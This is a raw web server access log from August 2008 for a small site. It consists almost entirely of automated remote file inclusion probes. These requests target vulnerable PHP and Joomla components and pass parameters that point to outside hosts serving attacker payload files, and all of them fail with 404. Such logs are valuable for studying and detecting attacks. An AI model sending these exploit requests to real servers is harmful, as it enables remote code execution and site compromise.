24.91.36.151 - - [03/Aug/2008:20:29:36 -0700] "GET /logs/errors.php?error=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
24.91.36.151 - - [03/Aug/2008:20:29:57 -0700] "GET /errors.php?error=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
24.91.36.151 - - [03/Aug/2008:20:29:57 -0700] "GET /logs/errors.php?error=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
24.91.36.151 - - [03/Aug/2008:20:29:59 -0700] "GET /logs/access_080421.log/errors.php?error=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
24.91.36.151 - - [03/Aug/2008:20:30:12 -0700] "GET /logs/access_080609.log/errors.php?error=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
74.6.22.92 - - [03/Aug/2008:20:30:35 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
74.6.22.92 - - [03/Aug/2008:20:30:35 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
88.27.112.153 - - [03/Aug/2008:20:31:03 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
88.27.112.153 - - [03/Aug/2008:20:31:16 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
88.27.112.153 - - [03/Aug/2008:20:32:50 -0700] "GET /logs/access_080623.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
74.6.22.92 - - [03/Aug/2008:20:36:44 -0700] "GET /logs/access_080630.log HTTP/1.0" 200 5806017 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
195.209.236.71 - - [03/Aug/2008:20:39:50 -0700] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.mathstamps.com"
195.209.236.71 - - [03/Aug/2008:20:39:50 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.mathstamps.com"
69.94.30.30 - - [03/Aug/2008:20:43:27 -0700] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.mathstamps.com"
69.94.30.30 - - [03/Aug/2008:20:43:27 -0700] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.mathstamps.com"
218.219.147.58 - - [03/Aug/2008:20:44:49 -0700] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
218.219.147.58 - - [03/Aug/2008:20:44:49 -0700] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
64.185.237.77 - - [03/Aug/2008:20:44:54 -0700] "GET /logs/access_080428.log//login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.185.237.77 - - [03/Aug/2008:20:44:59 -0700] "GET /logs//login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.185.237.77 - - [03/Aug/2008:20:47:01 -0700] "GET /logs/access_080421.log//login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
208.75.225.10 - - [03/Aug/2008:20:50:51 -0700] "GET /logs/access_080421.log///index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.75.225.10 - - [03/Aug/2008:20:50:51 -0700] "GET ///index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.75.225.10 - - [03/Aug/2008:20:50:51 -0700] "GET /logs///index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.75.225.10 - - [03/Aug/2008:20:50:55 -0700] "GET /logs/access_080609.log///index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
82.165.253.72 - - [03/Aug/2008:20:51:15 -0700] "GET /logs/access_080512.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.165.253.72 - - [03/Aug/2008:20:51:15 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.165.253.72 - - [03/Aug/2008:20:51:15 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.195.37.124 - - [03/Aug/2008:20:51:20 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:51:40 -0700] "GET /logs/access_080414.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:51:41 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:51:42 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:53:54 -0700] "GET /logs/access_080414.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:53:54 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:53:55 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:54:38 -0700] "GET /logs/access_080602.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:54:38 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:54:39 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:55:11 -0700] "GET /logs/access_080602.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:55:11 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:55:11 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
208.75.225.10 - - [03/Aug/2008:20:56:28 -0700] "GET ///index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
82.165.253.72 - - [03/Aug/2008:20:57:18 -0700] "GET /logs/access_080707.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:21:01:13 -0700] "GET /logs/access_080505.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:21:02:24 -0700] "GET /logs/access_080505.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.40.230.5 - - [03/Aug/2008:21:13:14 -0700] "GET /logs/access_080505.log//calendar/tools/send_reminders.php?noSet=0&includedir=http://www.suttas.com/files/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.40.230.5 - - [03/Aug/2008:21:13:14 -0700] "GET //calendar/tools/send_reminders.php?noSet=0&includedir=http://www.suttas.com/files/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.40.230.5 - - [03/Aug/2008:21:13:14 -0700] "GET /logs//calendar/tools/send_reminders.php?noSet=0&includedir=http://www.suttas.com/files/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.40.230.5 - - [03/Aug/2008:21:13:42 -0700] "GET /logs/access_080623.log//calendar/tools/send_reminders.php?noSet=0&includedir=http://www.suttas.com/files/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:21:14:06 -0700] "GET /logs/access_080421.log/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:21:14:08 -0700] "GET /errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:21:14:14 -0700] "GET /logs/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.135.59.180 - - [03/Aug/2008:21:14:24 -0700] "GET /logs/access_080623.log/index5.php?pagina=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.135.59.180 - - [03/Aug/2008:21:14:24 -0700] "GET /index5.php?pagina=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.135.59.180 - - [03/Aug/2008:21:14:25 -0700] "GET /logs/index5.php?pagina=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:21:14:57 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.135.59.180 - - [03/Aug/2008:21:15:41 -0700] "GET /logs/access_080526.log/index2.php?root_PATH=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.135.59.180 - - [03/Aug/2008:21:15:41 -0700] "GET /logs/index2.php?root_PATH=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.135.59.180 - - [03/Aug/2008:21:15:42 -0700] "GET /index2.php?root_PATH=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.135.59.180 - - [03/Aug/2008:21:15:48 -0700] "GET /logs/access_080616.log/index2.php?root_PATH=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.67.156 - - [03/Aug/2008:21:16:59 -0700] "GET /logs/access_080630.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/help01.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
89.108.67.156 - - [03/Aug/2008:21:17:00 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/help01.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
89.108.67.156 - - [03/Aug/2008:21:17:00 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/help01.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
89.108.67.156 - - [03/Aug/2008:21:17:01 -0700] "GET /logs/access_080707.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/help01.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
146.155.63.15 - - [03/Aug/2008:21:18:48 -0700] "GET /logs/access_080623.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
146.155.63.15 - - [03/Aug/2008:21:18:48 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
146.155.63.15 - - [03/Aug/2008:21:18:48 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
146.155.63.15 - - [03/Aug/2008:21:18:48 -0700] "GET /logs/access_080421.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
72.29.72.51 - - [03/Aug/2008:21:19:16 -0700] "GET /logs/access_080421.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.72.51 - - [03/Aug/2008:21:19:17 -0700] "GET /errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.72.51 - - [03/Aug/2008:21:19:17 -0700] "GET /logs/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.72.51 - - [03/Aug/2008:21:19:22 -0700] "GET /logs/access_080609.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.72.51 - - [03/Aug/2008:21:19:31 -0700] "GET /logs/access_080421.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.72.51 - - [03/Aug/2008:21:19:32 -0700] "GET /errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.72.51 - - [03/Aug/2008:21:19:32 -0700] "GET /logs/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.72.51 - - [03/Aug/2008:21:19:33 -0700] "GET /logs/access_080609.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:21:19:44 -0700] "GET /logs/access_080421.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:21:19:44 -0700] "GET /errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:21:19:45 -0700] "GET /logs/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:21:19:55 -0700] "GET /logs/access_080609.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:21:19:55 -0700] "GET /logs/access_080421.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:21:19:55 -0700] "GET /errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:21:19:56 -0700] "GET /logs/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
81.21.79.61 - - [03/Aug/2008:21:19:57 -0700] "GET /logs///index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:21:19:59 -0700] "GET /logs/access_080609.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
81.21.79.61 - - [03/Aug/2008:21:20:00 -0700] "GET ///index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.mathstamps.com"
91.188.128.5 - - [03/Aug/2008:21:21:39 -0700] "GET /logs/access_080519.log//skin/zero_vote/error.php?dir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
91.188.128.5 - - [03/Aug/2008:21:21:39 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
91.188.128.5 - - [03/Aug/2008:21:21:39 -0700] "GET //skin/zero_vote/error.php?dir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:21:21:47 -0700] "GET /logs/access_080421.log/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:21:21:48 -0700] "GET /errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:21:21:50 -0700] "GET /logs/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:21:22:20 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.135.59.180 - - [03/Aug/2008:21:22:30 -0700] "GET /logs/access_080623.log%20/index5.php?pagina=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:21:22:39 -0700] "GET /logs/access_080421.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:21:22:39 -0700] "GET /errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:21:22:44 -0700] "GET /logs/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:21:22:53 -0700] "GET /logs/access_080609.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
64.185.237.77 - - [03/Aug/2008:21:23:08 -0700] "GET /logs/access_080602.log//components/com_forum/download.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
91.188.128.5 - - [03/Aug/2008:21:24:21 -0700] "GET /logs/access_080428.log//skin/zero_vote/error.php?dir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.79.75.195 - - [03/Aug/2008:21:24:49 -0700] "GET /logs/errors.php?error=http://www.dogshop.at/poll/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.mathstamps.com"
209.97.201.148 - - [03/Aug/2008:21:27:07 -0700] "GET /logs/access_080421.log/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
209.97.201.148 - - [03/Aug/2008:21:27:07 -0700] "GET /logs/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
209.97.201.148 - - [03/Aug/2008:21:27:07 -0700] "GET /errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
209.97.201.148 - - [03/Aug/2008:21:27:08 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:21:30:11 -0700] "GET /logs/access_080421.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:21:30:11 -0700] "GET /errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:21:30:11 -0700] "GET /logs/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:21:30:20 -0700] "GET /logs/access_080609.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
72.29.72.51 - - [03/Aug/2008:21:32:19 -0700] "GET /logs/access_080414.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.72.51 - - [03/Aug/2008:21:32:19 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.72.51 - - [03/Aug/2008:21:32:19 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:21:32:27 -0700] "GET /logs/access_080421.log/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:21:32:29 -0700] "GET /errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:21:32:30 -0700] "GET /logs/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.29.72.51 - - [03/Aug/2008:21:32:49 -0700] "GET /logs/access_080303.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
81.21.79.61 - - [03/Aug/2008:21:33:08 -0700] "GET /logs///index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/test.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.mathstamps.com"
81.21.79.61 - - [03/Aug/2008:21:33:08 -0700] "GET ///index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/test.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:21:33:11 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
65.98.116.103 - - [03/Aug/2008:21:33:14 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.elnavegantedigital.es/components/pay/injek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
